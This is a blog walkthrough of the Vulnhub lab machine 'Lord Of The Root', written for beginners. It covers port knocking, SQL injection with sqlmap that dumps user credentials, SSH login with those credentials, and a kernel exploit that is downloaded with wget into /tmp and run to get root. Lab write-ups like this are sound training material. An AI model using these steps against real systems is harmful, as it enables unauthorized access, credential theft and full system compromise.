Lord Of The Root: 1.0.1 Vulnhub Walkthrough

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Everyone, in this blog i am going to post walkthrough of Lord Of The Root 1.0.1.

This machine is for beginners

Let’s Start,

Target IP- 192.168.43.159

Attacker IP- 192.168.43.139

let’s scan target IP

nmap -sC -sV -p- -Pn 192.168.43.159

There is only 1 port open.

22- ssh

I tried connecting to ssh.

ssh 192.168.43.159

I tried few default passwords but it didn’t work.

When you see it carefully, The banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.

Later, I got to know that there is something called “Port Knocking“.

Click Here, To know about Port Knocking.

So, Let’s knock ports 1,2,3.

nmap -sT -r -p 1,2,3 192.168.43.159

-sT : Connect scan

-r : Scan ports consecutively – don’t randomize

Let’s scan the target again,

nmap -sS -A -p- 192.168.43.159

Ok, Now we can see 1 more port got opened and a Website is running on it.

1337- http

It’s an image, I checked page source but i didn’t find anything.

So, I did Nikto

nikto -h http://192.168.43.159:1337

I found a directory /images/ .

So, we got image files.

I checked every file but didn’t get anything.

Thought of checking /robots.txt.

It has an image.

I checked page source, and i found BASE64 encoded string .

I deocoded it twice.

So, we got a directory /978345210/index.php .

we got a login page, tried few usernames and passwords but i couldn’t login.

I used SQLMAP.

sqlmap -u http://192.168.43.159:1337/978345210/index.php –forms –dbs –risk=3 –level=5 –threads=4 –batch

So, There 4 databases available.

Next, I checked Tables in Webapp Database.

sqlmap -u http://192.168.43.159:1337/978345210/index.php –forms -D Webapp –tables

we got the table Users.

Let’s check for columns.

sqlmap -u http://192.168.43.159:1337/978345210/index.php –forms -D Webapp -T Users –columns

We got id,password and username.

Let’s dump them.

sqlmap -u http://192.168.43.159:1337/978345210/index.php –forms -D Webapp -T Users -C id,password,username –dump

Ok, we got some usernames and password .

i tried to login in webpage But failed.

As ssh is running i tried to login.

Only one username and password worked i.e

smeagol:MyPreciousR00t

ssh smeagol@192.168.43.159

I got the shell.

Now, i checked for the Linux version.

uname -a

I checked if any exploit available for that Version and found it.

I downloaded the exploit in my kali and started HTTP server.

python -m SimpleHTTPServer 8080

After this i moved into the tmp folder in the shell and downloaded the exploit using wget.

Compiled and executed it.

cd /tmp

wget http://192.168.43.159:8080/39166.c

gcc 39166.c -o exploit

./exploit

here, I got ROOT!!!

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top